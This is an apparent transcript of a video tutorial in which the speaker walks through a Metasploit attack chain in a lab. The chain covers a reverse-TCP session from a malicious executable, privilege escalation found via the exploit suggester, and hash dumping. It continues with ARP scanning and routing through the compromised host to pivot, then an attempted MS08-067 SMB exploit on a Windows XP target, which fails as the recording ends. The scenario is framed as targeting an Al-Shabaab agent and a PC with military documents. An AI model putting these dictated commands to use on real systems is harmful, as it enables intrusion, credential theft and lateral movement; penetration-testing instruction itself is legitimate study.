Okay, if you've been following my tutorials, you must have actually learned a lot, and I've previously shown how to hack PCs. So I've already set up a listener and sent an executable file to the target PC. So our target PC, as we said, this computer, let me show you. So let's say an Al-Shabaab agent received an email with an executable file which he or she opened. Okay, we end up compromising this network, or subnet of this network. Okay, so this is their PC and they have downloaded this file. So if you double click on this file, let me try to minimize. I'm running out of memory because my VMs are large. Okay, I'm sorry for inconveniences. So if I try and run this file, okay, you'll see here we have a session. Okay, now we have compromised our PC here, or their PC, and we need to see who we are in this computer. So let's check the session first. Sessions. Okay, as you can see, we have 3 sessions, more than 3 because the others have been using them. So session 3 was open. Okay, let's interact with that session. Sessions, sorry, tag I, then 3. Then we can get our ID, get user ID. We are guest. Okay, so can we get system, get system, see whether we can. So we don't have privileges. What can we do? There's so many other exploits that we can use to escalate privileges in Windows 7. So we will background this, background. Okay, then do what? We are going to use this exploit. Use exploit Windows local okay, let me rather show you something else. Want to check the other exploits that we can use and see what we can get. So use post multi recon. Want to recon this PC local underscore local underscore exploit suggester. So we want to see with which other exploits can we use. Okay, so let's show options. Want to see what you're supposed to set. So we need to set the session. Okay, set session, and we know our session is 3. Then run this once to see what other those exploits that we can use. Okay, so it's trying to collect exploits for x86, so the architecture is this and the platform is Windows. If you give it time, probably it will come up with a number of exploits that are available, which you can use to perform privilege escalation on this PC. So that 7 exploits have been found, and they're being checked, or they're being tried. So you can see there are many. Okay, it is done. So I want to use pop-up menu. There is pop-up menu, or we can even try this. The target appears to be vulnerable to this exploit here. My PC is hanging, oh my goodness. Okay, hope it will work. Okay, we can use escalate and try to see if this can work. Okay, let's try and use this exploit because I've tried this one. So use exploit and to set this exploit. In case, let me copy and paste, enter, show options. So we need to set session, set session. You know, session is 3. Okay, then we can try and run this. This exploit tried, but it has not been able to create okay, let's set payload, try Windows, meta operator, reverse underscore TCP, set L host 192.168.56.102, set L port, let's try 445, then run. Yeah, so we have been able to spawn another session. Probably if we check get UID, we are now authority, system authority. So you can now actually do hash dump, hash dump, get the passwords from that system. Okay, as you can see, we have guest and compound administrator and their hashed passwords, but this is not what we wanted. Okay, so we have been able to elevate our privileges on this system, that is privilege escalation. So from there we would want to config. As you can see, we have in 15, which is that, and there is another network here and interface 14. So we would try to scan that network range and see if we can find actually our target machine, which I showed you, and so we have compromised this PC, and as you can see, this is the network adapter 2 that has another, okay, belongs to another subnet of the network. So we want now, after escalating of privileges here, we want to pivot, use this PC and try to scan this other network and see if we can get another vulnerable PC, which we know there is a PC here with military documents that we are targeting. Okay, so let's continue, see what we can do. So run arp underscore scanner, then we give it the switch R for the IP. So we are going to scan from the router, okay, all the way to, okay, class C network, okay, and see if we can come up with another PC on that other network. I'm sorry, the network is 2. Yeah, this is the network, the other network, because we don't belong to this other network here. Okay, that's the network we found. Should do a scan on that. Let me paste this, making errors. Anyway, anyone is prone to this. Let's see what we can get. Okay, so we are using ARP scanner to try and scan that network range and see if we can find our target PC. Okay, in fact it has come up here. This is the IP of our target machine. Let me copy it, and this is our router, and probably the other IP is the IP of the computer that we have already exploited. So we are almost done scanning. Okay, there we are. We have found our target machine. Let me background this. Background. So what are we gonna do? We want to create a route. So route add is give it the network, then .0, then the session that we want to route through, which is 4, of course. Let's print route. I believe there is an issue. route add, we added the route. It is route print. Okay, route print. Okay, so we are now directing our exploits through the PC that we exploited to the other subnet. Okay, we have compromised this and we are using this PC here to stage our attack on this other network. Okay, so we have scanned this network and found this PC. We need to look for an exploit for this PC. We know it is Windows XP. Okay, so we need an exploit, and using our compromised PC we can now stage our attack from that PC to the other PC. Okay, so use exploit Windows SMB MS 008, believe, NetAPI. Okay, then enter. Need to set payload Windows metaoperator reverse underscore TCP. Okay, then set lhost, which is 192.168.56.102. set port, which you know, the port now we can use port let's say 4444. Then show options. We need to set the remote port. Okay, and leave, sorry, we need to set the remote host. This is the IP of the target PC, and then the remote port is 445. That is where the SMB service runs. Okay, it runs on that port. So set our host to 192.168.2.3. okay, then now we exploit and see what we'll get. Okay, it has failed, exploit failed, no access. Try again. The session has failed. Exploit failed. It has detected the system, but it actually fails. Okay, sometimes this happens, and I'm gonna go through this and troubleshoot to see where I made an error, and I'll get back to you. Thanks for watching this video tutorial. Feel free to subscribe and like my videos.